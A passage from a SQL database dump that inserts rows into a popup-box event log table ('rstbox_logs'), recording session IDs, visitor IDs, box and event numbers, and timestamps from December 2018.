(39392, '9081c97160fb33eacf689a624eb41f35', 'a85090d640d3009d', 0, 2, 1, '2018-12-15 14:50:59'),
(39393, 'b6756a6c5f71a03e002e4815ffbf975b', '324b9b48cb70ff46', 0, 2, 1, '2018-12-15 14:56:06'),
(39394, 'b6756a6c5f71a03e002e4815ffbf975b', '324b9b48cb70ff46', 0, 2, 1, '2018-12-15 14:58:32'),
(39395, 'fc2473797db37fceba439a2ce5db27a6', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-15 14:59:12'),
(39396, 'fc2473797db37fceba439a2ce5db27a6', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-15 15:00:02'),
(39397, 'b6756a6c5f71a03e002e4815ffbf975b', '324b9b48cb70ff46', 0, 2, 1, '2018-12-15 15:00:28'),
(39398, 'fc2473797db37fceba439a2ce5db27a6', 'f8d002c7b8b76490', 0, 2, 1, '2018-12-15 15:01:25'),
(39399, 'b6756a6c5f71a03e002e4815ffbf975b', '324b9b48cb70ff46', 0, 2, 1, '2018-12-15 15:01:50'),
(39400, '4f8422a57baf7aa6b65fe42d3b4bfea2', '0eb760e081a4af82', 0, 2, 1, '2018-12-15 15:16:52'),
(39401, 'e6685bd48b2505c5fd8046933aa9790e', '1de090ec808c88cc', 0, 2, 1, '2018-12-15 15:27:29'),
(39402, 'e6685bd48b2505c5fd8046933aa9790e', '1de090ec808c88cc', 0, 2, 1, '2018-12-15 15:28:35'),
(39403, 'ae40dc89028d2d3490b006207f92afb0', '0fd555a49bfaca51', 0, 2, 1, '2018-12-15 15:44:56'),
(39404, '540082e860ccd816733f3a4573daf5b4', 'b3e086714401d576', 0, 2, 1, '2018-12-15 15:49:23'),
(39405, '251d6fc6b93050ecd1d9618f29c5b239', '7b4f54f0b541af2d', 0, 2, 1, '2018-12-15 15:57:22'),
(39406, '251d6fc6b93050ecd1d9618f29c5b239', '7b4f54f0b541af2d', 0, 2, 1, '2018-12-15 15:57:44'),
(39407, '251d6fc6b93050ecd1d9618f29c5b239', '7b4f54f0b541af2d', 0, 2, 1, '2018-12-15 15:58:26'),
(39408, '93fbbf3581c90ad8a20d52c7fd2ba5d8', 'b3e086714401d576', 0, 2, 1, '2018-12-15 16:11:50'),
(39409, '93fbbf3581c90ad8a20d52c7fd2ba5d8', 'b3e086714401d576', 0, 2, 1, '2018-12-15 16:14:11'),
(39410, 'bea621810336b792ba1c97795dfd4b15', '483dca80afa659bb', 0, 2, 1, '2018-12-15 16:15:14'),
(39411, '93fbbf3581c90ad8a20d52c7fd2ba5d8', 'b3e086714401d576', 0, 2, 1, '2018-12-15 16:18:02'),
(39412, '93fbbf3581c90ad8a20d52c7fd2ba5d8', 'b3e086714401d576', 0, 2, 1, '2018-12-15 16:19:14'),
(39413, 'eefc019e54bd38f78ce9029566541789', '310a634b76ed236f', 0, 2, 1, '2018-12-15 16:22:12'),
(39414, 'eefc019e54bd38f78ce9029566541789', '310a634b76ed236f', 0, 2, 1, '2018-12-15 16:22:29'),
(39415, 'eefc019e54bd38f78ce9029566541789', '310a634b76ed236f', 0, 2, 1, '2018-12-15 16:24:15'),
(39416, '92667ca2401d91587ab47c686bb37d21', '27548462d0db1e1a', 0, 2, 1, '2018-12-15 16:29:54'),
(39417, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 16:31:07'),
(39418, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 16:31:24'),
(39419, 'dab03bda477f51d4ec2fc3358520ce42', 'a241b97c40d2b2c5', 0, 2, 1, '2018-12-15 17:31:59'),
(39420, '33ab31936879142165ac61edc1802e4b', '679c2311f97bf8cf', 0, 2, 1, '2018-12-15 17:35:25'),
(39421, '6648807ef368fec1785a8981e3f7d6bc', '7e7b8558fe1fccd3', 0, 2, 1, '2018-12-15 17:47:39'),
(39422, '5cd2d3b5848818235f895306e33765cb', '358a3a4d13e5d4e5', 0, 2, 1, '2018-12-15 17:49:20'),
(39423, '8f0986730cfd0c509bed282d8bfdd29f', '0f7815dc74d24cdd', 0, 2, 1, '2018-12-15 18:13:55'),
(39424, 'b08a6b9b7b44bf52199ccc08a569accb', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2018-12-15 18:24:59'),
(39425, '9402669839f17eb31a55849823780fb2', '81cfcf34638be6ea', 0, 2, 1, '2018-12-15 19:10:15'),
(39426, '9402669839f17eb31a55849823780fb2', '81cfcf34638be6ea', 0, 2, 1, '2018-12-15 19:10:24'),
(39427, '59bb0d7fbedfc8a09e497efdb73ca8df', 'd1260c2c81a3fc59', 0, 2, 1, '2018-12-15 19:34:03'),
(39428, 'd82b4c6bf743b58350e374345c47ff02', '624d6937076d1188', 0, 2, 1, '2018-12-15 19:35:25'),
(39429, '59bb0d7fbedfc8a09e497efdb73ca8df', 'd1260c2c81a3fc59', 0, 2, 1, '2018-12-15 19:59:29'),
(39430, '59bb0d7fbedfc8a09e497efdb73ca8df', 'd1260c2c81a3fc59', 0, 2, 1, '2018-12-15 20:00:24'),
(39431, '59bb0d7fbedfc8a09e497efdb73ca8df', 'd1260c2c81a3fc59', 0, 2, 1, '2018-12-15 20:00:56'),
(39432, '59bb0d7fbedfc8a09e497efdb73ca8df', 'd1260c2c81a3fc59', 0, 2, 1, '2018-12-15 20:01:38'),
(39433, '59bb0d7fbedfc8a09e497efdb73ca8df', 'd1260c2c81a3fc59', 0, 2, 1, '2018-12-15 20:02:24'),
(39434, '649a962fc6c3d22d512684b15e8b8efe', '7c5bcf99f2070582', 0, 2, 1, '2018-12-15 20:08:34'),
(39435, '649a962fc6c3d22d512684b15e8b8efe', '7c5bcf99f2070582', 0, 2, 1, '2018-12-15 20:09:37'),
(39436, '649a962fc6c3d22d512684b15e8b8efe', '7c5bcf99f2070582', 0, 2, 1, '2018-12-15 20:09:52'),
(39437, 'b23a10ed65dd51ba49354f8992b3df7b', '4391bd9ad976216a', 0, 2, 1, '2018-12-15 20:16:30'),
(39438, 'b23a10ed65dd51ba49354f8992b3df7b', '4391bd9ad976216a', 0, 2, 1, '2018-12-15 20:16:45'),
(39439, 'b23a10ed65dd51ba49354f8992b3df7b', '4391bd9ad976216a', 0, 2, 1, '2018-12-15 20:17:36'),
(39440, 'b23a10ed65dd51ba49354f8992b3df7b', '4391bd9ad976216a', 0, 2, 1, '2018-12-15 20:17:49'),
(39441, 'b23a10ed65dd51ba49354f8992b3df7b', '4391bd9ad976216a', 0, 2, 1, '2018-12-15 20:18:24'),
(39442, '649a962fc6c3d22d512684b15e8b8efe', '7c5bcf99f2070582', 0, 2, 1, '2018-12-15 20:19:27'),
(39443, '0d580ffb2894fc1c4954e3dac642a367', '813518eddc998d16', 0, 2, 1, '2018-12-15 20:34:24'),
(39444, '0d580ffb2894fc1c4954e3dac642a367', '813518eddc998d16', 0, 2, 1, '2018-12-15 20:44:41'),
(39445, '0d580ffb2894fc1c4954e3dac642a367', '813518eddc998d16', 0, 2, 1, '2018-12-15 20:45:01'),
(39446, '58df695e2bde48f94081355a583280dd', '6420d9840f07d5c4', 0, 2, 1, '2018-12-15 21:12:21'),
(39447, '22f7844a3f8851126fa50652c6c3996d', '6092d6c1cb041b23', 0, 2, 1, '2018-12-15 21:20:42'),
(39448, 'ac1908ad7bd22602dc229e4e20f0ab18', '6b39dd77c46d78c8', 0, 2, 1, '2018-12-15 21:25:09'),
(39449, '63ca1671dda606e896a8a30098dd2d7d', '27d3b62cdd82d36e', 0, 2, 1, '2018-12-15 22:05:05'),
(39450, '3ab431b05d9aab683f18c0a130f84e0f', 'cb6b61634331b281', 0, 2, 1, '2018-12-15 23:01:39'),
(39451, '3c8390937d12000409541b5b8a5fadc3', '9ab694e16a133163', 0, 2, 1, '2018-12-15 23:02:17'),
(39452, '235274a2781b92b77ffef2e0dc552a45', '9ab694e16a133163', 0, 2, 1, '2018-12-15 23:05:36'),
(39453, '4298bdbb78c00b1ff7413771a009e94f', 'd6b9cd5bfdd27ced', 0, 2, 1, '2018-12-15 23:31:53'),
(39454, '4298bdbb78c00b1ff7413771a009e94f', 'd6b9cd5bfdd27ced', 0, 2, 1, '2018-12-15 23:32:06'),
(39455, 'f4b4f6934e7c0f8bdaa8a86e151cdf72', '8166beea3224d6b3', 0, 2, 1, '2018-12-15 23:36:51'),
(39456, 'f4b4f6934e7c0f8bdaa8a86e151cdf72', '8166beea3224d6b3', 0, 2, 1, '2018-12-15 23:38:25'),
(39457, 'f4b4f6934e7c0f8bdaa8a86e151cdf72', '8166beea3224d6b3', 0, 2, 1, '2018-12-15 23:39:02'),
(39458, 'f4b4f6934e7c0f8bdaa8a86e151cdf72', '8166beea3224d6b3', 0, 2, 1, '2018-12-15 23:39:38'),
(39459, 'f4b4f6934e7c0f8bdaa8a86e151cdf72', '8166beea3224d6b3', 0, 2, 1, '2018-12-15 23:39:50'),
(39460, '5a0f236513a41d055fb364ec07c7fe41', '8e010a71b395f5ee', 0, 2, 1, '2018-12-16 00:13:38'),
(39461, 'f3cec42519cfe1037692ff0df8d89f07', 'e3ed0521ea10d3f5', 0, 2, 1, '2018-12-16 00:14:09'),
(39462, 'ae540e520231e126a118da8134853b15', '50d02461c9e1908b', 0, 2, 1, '2018-12-16 00:17:57'),
(39463, '93ecd7c1989595f9181ff4b1ef62623d', 'd291f1b96fc5fbb9', 0, 2, 1, '2018-12-16 02:20:02'),
(39464, '93ecd7c1989595f9181ff4b1ef62623d', 'd291f1b96fc5fbb9', 0, 2, 1, '2018-12-16 02:20:23'),
(39465, '93ecd7c1989595f9181ff4b1ef62623d', 'd291f1b96fc5fbb9', 0, 2, 1, '2018-12-16 02:20:36'),
(39466, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-16 02:20:55'),
(39467, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-16 02:21:01'),
(39468, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-16 02:21:09'),
(39469, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-16 02:21:20'),
(39470, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-16 02:21:49'),
(39471, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-16 02:22:19'),
(39472, 'c8d8c9400fb3d8354496e292c77c8c4b', '55dd11ca982115e8', 0, 2, 1, '2018-12-16 02:24:05'),
(39473, 'a4471c48bd2e42dfe4435f797c8429c8', '4c8d57f1ea3e9071', 0, 2, 1, '2018-12-16 02:50:58'),
(39474, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-16 03:18:37'),
(39475, 'c2509bf1ca4f699fe9c32b3f260a23d7', 'b0b809dfb20904a9', 0, 2, 1, '2018-12-16 03:18:52'),
(39476, '65a4f5b35b4538c140a0c92e92daede5', '5b3051f95f43261f', 0, 2, 1, '2018-12-16 04:14:12'),
(39477, 'edcbea329a6be93d546ab87827ec8017', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-16 04:52:01'),
(39478, 'edcbea329a6be93d546ab87827ec8017', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-16 04:52:04'),
(39479, '105a9d19a8b6e08d0aaad95122533a2f', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 04:55:56'),
(39480, '3429f6eb265ff386cfc01f3a9632d22a', 'd55ac0b136bed2ae', 0, 2, 1, '2018-12-16 04:58:46'),
(39481, '91317c88fb6ed203b92aa2fe6dcbbfa3', '4a7924dd4418962c', 0, 2, 1, '2018-12-16 04:59:47'),
(39482, '3429f6eb265ff386cfc01f3a9632d22a', 'd55ac0b136bed2ae', 0, 2, 1, '2018-12-16 04:59:51'),
(39483, '91317c88fb6ed203b92aa2fe6dcbbfa3', '4a7924dd4418962c', 0, 2, 1, '2018-12-16 05:00:00'),
(39484, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 05:00:10'),
(39485, 'd2518c01e2f143889255e71f71f7deb4', 'f93b36bb374ed1a7', 0, 2, 1, '2018-12-16 05:01:49'),
(39486, '4365f5f1b8a11a647a41bc11df09cc96', '544792a504897a83', 0, 2, 1, '2018-12-16 05:02:17'),
(39487, 'f3f9741e12f555411f3381847bae21d4', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-16 05:02:21'),
(39488, '3796ac2a619ea9e8744866b426d05f90', 'e3163f1046dc4449', 0, 2, 1, '2018-12-16 05:02:23'),
(39489, 'f3f9741e12f555411f3381847bae21d4', 'f10990f26adcd1c5', 0, 2, 1, '2018-12-16 05:02:29'),
(39490, '79c6d9799f01c47ae9c6410275b9022e', '74aba437eea39f30', 0, 2, 1, '2018-12-16 05:02:34'),
(39491, '3796ac2a619ea9e8744866b426d05f90', 'e3163f1046dc4449', 0, 2, 1, '2018-12-16 05:02:38'),
(39492, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-16 05:02:54'),
(39493, '3796ac2a619ea9e8744866b426d05f90', 'e3163f1046dc4449', 0, 2, 1, '2018-12-16 05:02:55'),
(39494, 'cedb8e487617df6d11edb42469e85d58', 'ee048a80ed202af2', 0, 2, 1, '2018-12-16 05:03:24'),
(39495, 'f38e023b507c480101b5b4504deba441', 'ab8367dfea54bd3e', 0, 2, 1, '2018-12-16 05:03:46'),
(39496, '1a1d158bc7e47dba41f4915bf22d5bce', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-16 05:04:07'),
(39497, '8d6b552a21e92adf98a97164c64dc3de', '4b8272c521136738', 0, 2, 1, '2018-12-16 05:05:48'),
(39498, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 05:05:56'),
(39499, 'd5b1553c4213f9362708ca49a5fc9749', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-16 05:06:25'),
(39500, '95668fa8c955df734986d80db220b6f4', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-16 05:06:46'),
(39501, '105a9d19a8b6e08d0aaad95122533a2f', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 05:07:13'),
(39502, '9947926a10728bea7fac6051f14d7a10', '553b9f0a18b97af8', 0, 2, 1, '2018-12-16 05:08:11'),
(39503, '9947926a10728bea7fac6051f14d7a10', '553b9f0a18b97af8', 0, 2, 1, '2018-12-16 05:08:35'),
(39504, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:08:58'),
(39505, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:09:23'),
(39506, '95668fa8c955df734986d80db220b6f4', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-16 05:09:34'),
(39507, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 05:11:12'),
(39508, 'e402f199b1f6b2e6e916a8c7223e932e', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-16 05:11:13'),
(39509, 'e402f199b1f6b2e6e916a8c7223e932e', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-16 05:11:19'),
(39510, 'd2d24212970e57a4aac961cf5899fc6c', '46713cac27a94b83', 0, 2, 1, '2018-12-16 05:11:29'),
(39511, 'd2d24212970e57a4aac961cf5899fc6c', '46713cac27a94b83', 0, 2, 1, '2018-12-16 05:11:45'),
(39512, '9947926a10728bea7fac6051f14d7a10', '553b9f0a18b97af8', 0, 2, 1, '2018-12-16 05:11:51'),
(39513, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 05:12:00'),
(39514, 'd2518c01e2f143889255e71f71f7deb4', 'f93b36bb374ed1a7', 0, 2, 1, '2018-12-16 05:12:07'),
(39515, 'a746cf4ab2cec41091d0140c43979a0a', '373d74b03c36f6e0', 0, 2, 1, '2018-12-16 05:12:18'),
(39516, 'cc37f225bfe9a7f309a55be15f571dad', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2018-12-16 05:12:19'),
(39517, 'cc37f225bfe9a7f309a55be15f571dad', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2018-12-16 05:12:31'),
(39518, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:12:46'),
(39519, 'd2d24212970e57a4aac961cf5899fc6c', '46713cac27a94b83', 0, 2, 1, '2018-12-16 05:13:06'),
(39520, '3c17138577a10f854a156ad2557cb525', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-16 05:13:28'),
(39521, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:13:28'),
(39522, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-16 05:13:39'),
(39523, '11cb2a9e1da86fe1a9715d383d2ff74e', '3d44c66461ccc3c1', 0, 2, 1, '2018-12-16 05:13:43'),
(39524, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 05:14:04'),
(39525, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:14:13'),
(39526, 'a746cf4ab2cec41091d0140c43979a0a', '373d74b03c36f6e0', 0, 2, 1, '2018-12-16 05:14:23'),
(39527, '105a9d19a8b6e08d0aaad95122533a2f', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 05:14:36'),
(39528, '05361eb8cf6adf426dadb6e9504e8cdf', 'cad202a09758cb3a', 0, 2, 1, '2018-12-16 05:14:52'),
(39529, '05361eb8cf6adf426dadb6e9504e8cdf', 'cad202a09758cb3a', 0, 2, 1, '2018-12-16 05:15:19'),
(39530, '05361eb8cf6adf426dadb6e9504e8cdf', 'cad202a09758cb3a', 0, 2, 1, '2018-12-16 05:15:30'),
(39531, 'a9f5f86e27040cb244c6538d2e7e2002', '908e4713e73e5fdd', 0, 2, 1, '2018-12-16 05:15:33'),
(39532, 'c0c59b36b80bfaa7aaeed2dd6051786f', '6bc7e1c1fc1a8680', 0, 2, 1, '2018-12-16 05:15:36'),
(39533, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:15:42'),
(39534, 'a9f5f86e27040cb244c6538d2e7e2002', '908e4713e73e5fdd', 0, 2, 1, '2018-12-16 05:15:43'),
(39535, 'ac1908ad7bd22602dc229e4e20f0ab18', '6b39dd77c46d78c8', 0, 2, 1, '2018-12-16 05:15:50'),
(39536, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:15:50'),
(39537, 'dd273561523bbfad2172f191d0adc13f', '67d9c3341cc72093', 0, 2, 1, '2018-12-16 05:15:51'),
(39538, '05361eb8cf6adf426dadb6e9504e8cdf', 'cad202a09758cb3a', 0, 2, 1, '2018-12-16 05:15:53'),
(39539, 'e5d6a809a46e93e6aca90737eee80504', '72b93381959cb5c8', 0, 2, 1, '2018-12-16 05:15:53'),
(39540, '6695b208137f3d800d65330efc4446e6', 'a241b97c40d2b2c5', 0, 2, 1, '2018-12-16 05:15:58'),
(39541, 'dc04003652b254a17274adbfb4f469ce', 'dace6e0c219330fc', 0, 2, 1, '2018-12-16 05:15:58'),
(39542, '95668fa8c955df734986d80db220b6f4', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-16 05:16:34'),
(39543, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:16:42'),
(39544, 'ac1908ad7bd22602dc229e4e20f0ab18', '6b39dd77c46d78c8', 0, 2, 1, '2018-12-16 05:16:48'),
(39545, 'a4f3c303622aa674ee0724758637f615', '553b9f0a18b97af8', 0, 2, 1, '2018-12-16 05:17:04'),
(39546, '31aa736741b239647d203aebaf694340', '1c37edd466b05b6c', 0, 2, 1, '2018-12-16 05:17:11'),
(39547, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-16 05:17:21'),
(39548, 'f1c716b651690bd4fa2bf673268f0137', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 05:17:54'),
(39549, '105a9d19a8b6e08d0aaad95122533a2f', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 05:18:51'),
(39550, '6695b208137f3d800d65330efc4446e6', 'a241b97c40d2b2c5', 0, 2, 1, '2018-12-16 05:18:53'),
(39551, 'f1c716b651690bd4fa2bf673268f0137', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 05:19:08'),
(39552, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-16 05:19:40'),
(39553, '8171f8e12a7d43e62f211942072757e7', 'df27b9a2919a8206', 0, 2, 1, '2018-12-16 05:19:44'),
(39554, '101df94cb82c0661dd46aa92d98aaeb1', '3de88ff4581dab27', 0, 2, 1, '2018-12-16 05:19:52'),
(39555, '27ec60e2d904dbd108e26f5192d7332f', 'a06df92c3e268263', 0, 2, 1, '2018-12-16 05:19:54'),
(39556, 'dd273561523bbfad2172f191d0adc13f', '67d9c3341cc72093', 0, 2, 1, '2018-12-16 05:20:07'),
(39557, '92f00880b48de92133f892f2ead9411e', '5546a509e0a852da', 0, 2, 1, '2018-12-16 05:20:10'),
(39558, 'f1c716b651690bd4fa2bf673268f0137', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 05:20:31'),
(39559, 'f1c716b651690bd4fa2bf673268f0137', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 05:21:10'),
(39560, 'ba42a6eca32adb8fb66fb74f11d02fc4', 'd131367378b77fb4', 0, 2, 1, '2018-12-16 05:21:43'),
(39561, '95668fa8c955df734986d80db220b6f4', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-16 05:21:59'),
(39562, '1d255b96d05b134974f47ce06c6b7def', 'b800ba4fd7a89f76', 0, 2, 1, '2018-12-16 05:22:07'),
(39563, '259acb8f54d2d75cd2db50009e8bb20a', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-16 05:22:38'),
(39564, 'ba42a6eca32adb8fb66fb74f11d02fc4', 'd131367378b77fb4', 0, 2, 1, '2018-12-16 05:22:45'),
(39565, '259acb8f54d2d75cd2db50009e8bb20a', 'b57104b37a2d8fd8', 0, 2, 1, '2018-12-16 05:22:45'),
(39566, '78f0e4828d1f7f7846867ef4d300d8b9', '8a144e5fc2e94311', 0, 2, 1, '2018-12-16 05:23:07'),
(39567, 'b7066876e54ac7c285b8dd2e198e9092', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-16 05:23:17'),
(39568, '3796ac2a619ea9e8744866b426d05f90', 'e3163f1046dc4449', 0, 2, 1, '2018-12-16 05:23:19'),
(39569, 'd6dde22d41f09c204ef863f62424eba6', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-16 05:23:24'),
(39570, '732aa6a16acab92c505acbd44bc7f63e', '3b4446abb707e8c0', 0, 2, 1, '2018-12-16 05:23:29'),
(39571, '420d3362af265de420436765120c045c', '2aaddecf4b23c2ee', 0, 2, 1, '2018-12-16 05:23:31'),
(39572, 'b7066876e54ac7c285b8dd2e198e9092', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-16 05:23:38'),
(39573, '420d3362af265de420436765120c045c', '2aaddecf4b23c2ee', 0, 2, 1, '2018-12-16 05:23:56'),
(39574, 'd6dde22d41f09c204ef863f62424eba6', 'a86d0aa20820f4cb', 0, 2, 1, '2018-12-16 05:24:09'),
(39575, 'f1c716b651690bd4fa2bf673268f0137', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 05:24:34'),
(39576, '78f0e4828d1f7f7846867ef4d300d8b9', '8a144e5fc2e94311', 0, 2, 1, '2018-12-16 05:24:47'),
(39577, 'ee1521792107ec1425df9431651731ef', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-16 05:25:27'),
(39578, 'd2d24212970e57a4aac961cf5899fc6c', '46713cac27a94b83', 0, 2, 1, '2018-12-16 05:26:11'),
(39579, '7e25e0a86a4e4105754ccf2384ad5013', '8ff7716f8a6d651f', 0, 2, 1, '2018-12-16 05:26:31'),
(39580, '95668fa8c955df734986d80db220b6f4', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-16 05:26:40'),
(39581, 'd6567e2e40dec6b1ee1764248e49e5a5', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-16 05:27:02'),
(39582, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-16 05:27:23'),
(39583, 'f1c716b651690bd4fa2bf673268f0137', '57587ada79ea2aa6', 0, 2, 1, '2018-12-16 05:30:15'),
(39584, '2f9bc6f50f9f42089e6a10710fdd5235', '38721ea1b385a81f', 0, 2, 1, '2018-12-16 05:30:17'),
(39585, '26cfa27ff4c6634839dab30bb94d745c', '1ec75219d7482e28', 0, 2, 1, '2018-12-16 05:30:31'),
(39586, '20f3cf859ff35f0dedaa51216d9b829c', 'e38fbc76ae580892', 0, 2, 1, '2018-12-16 05:30:35'),
(39587, '2f9bc6f50f9f42089e6a10710fdd5235', '38721ea1b385a81f', 0, 2, 1, '2018-12-16 05:30:43'),
(39588, 'd6567e2e40dec6b1ee1764248e49e5a5', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-16 05:31:21'),
(39589, '163e2b8887f2b8b9efb0cee906a51343', 'ac5f99c20e27d1aa', 0, 2, 1, '2018-12-16 05:31:40'),
(39590, '93753798eeb844dfb9b97c559f067115', '5c6572dc21972a01', 0, 2, 1, '2018-12-16 05:32:04'),
(39591, '050376596ae95d8eab983fee0204aa05', '9968c5be4a7971a2', 0, 2, 1, '2018-12-16 05:33:04'),
(39592, 'd6567e2e40dec6b1ee1764248e49e5a5', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-16 05:33:39'),
(39593, 'd2d24212970e57a4aac961cf5899fc6c', '46713cac27a94b83', 0, 2, 1, '2018-12-16 05:33:47'),
(39594, 'd6567e2e40dec6b1ee1764248e49e5a5', 'f85de81f8eb472cb', 0, 2, 1, '2018-12-16 05:34:03'),
(39595, '7e25e0a86a4e4105754ccf2384ad5013', '8ff7716f8a6d651f', 0, 2, 1, '2018-12-16 05:34:18'),
(39596, '2f9bc6f50f9f42089e6a10710fdd5235', '38721ea1b385a81f', 0, 2, 1, '2018-12-16 05:34:24'),
(39597, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 05:34:55'),
(39598, '21be6289f11055930fe142a101622157', 'b0d0f692147f0dd4', 0, 2, 1, '2018-12-16 05:34:59'),
(39599, '7e25e0a86a4e4105754ccf2384ad5013', '8ff7716f8a6d651f', 0, 2, 1, '2018-12-16 05:35:01'),
(39600, 'eb6526f9e1872cc54c41ec6c4f179e1b', 'cc8fa14736af0c49', 0, 2, 1, '2018-12-16 05:35:06'),
(39601, '7e25e0a86a4e4105754ccf2384ad5013', '8ff7716f8a6d651f', 0, 2, 1, '2018-12-16 05:35:18'),
(39602, '78cd67ec82fefd04f264449fed1cff5d', '8a9a355b6c67c74a', 0, 2, 1, '2018-12-16 05:35:22');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(39603, 'c66e405c513bf0d19b72b9bc480cbee3', '6e117bd555667400', 0, 2, 1, '2018-12-16 05:36:55'),
(39604, '1354dcef6ce23a14ca719ded01d27ceb', '8e010a71b395f5ee', 0, 2, 1, '2018-12-16 05:39:07'),
(39605, '95668fa8c955df734986d80db220b6f4', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-16 05:40:17'),
(39606, '9d20950efaa6fce110212047c8ed5fe3', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-16 05:40:36'),
(39607, '9d20950efaa6fce110212047c8ed5fe3', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-16 05:40:43'),
(39608, '105a9d19a8b6e08d0aaad95122533a2f', '32b169e936bbe5df', 0, 2, 1, '2018-12-16 05:40:46'),
(39609, '140d9e890762d8db9ba4e290dafc00f2', 'f1e724d1b9d2056c', 0, 2, 1, '2018-12-16 05:42:04'),
(39610, 'bc8ca840c1d13f3ac8e32b6eec10f03f', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-16 05:44:33'),
(39611, '1a1d158bc7e47dba41f4915bf22d5bce', 'c7d4ce8b0de12339', 0, 2, 1, '2018-12-16 05:44:47'),
(39612, 'eb6526f9e1872cc54c41ec6c4f179e1b', 'cc8fa14736af0c49', 0, 2, 1, '2018-12-16 05:45:57'),
(39613, 'd6e21711a0f5190c6503fd49916459c8', '6092d6c1cb041b23', 0, 2, 1, '2018-12-16 05:46:52'),
(39614, '92f00880b48de92133f892f2ead9411e', '5546a509e0a852da', 0, 2, 1, '2018-12-16 05:46:56'),
(39615, '500889da5de97fbec701ac8e0edac55b', 'a5736c988cfb53ac', 0, 2, 1, '2018-12-16 05:47:50'),
(39616, '052f0a999dfeb589086f6f8e32f1c6a5', '4599e2ad4bb251fe', 0, 2, 1, '2018-12-16 05:48:34'),
(39617, 'e51e4e4fa804b9dce6418157e1457890', '3a681ce2bd8cc6dd', 0, 2, 1, '2018-12-16 05:48:50'),
(39618, 'd6e21711a0f5190c6503fd49916459c8', '6092d6c1cb041b23', 0, 2, 1, '2018-12-16 05:49:07'),
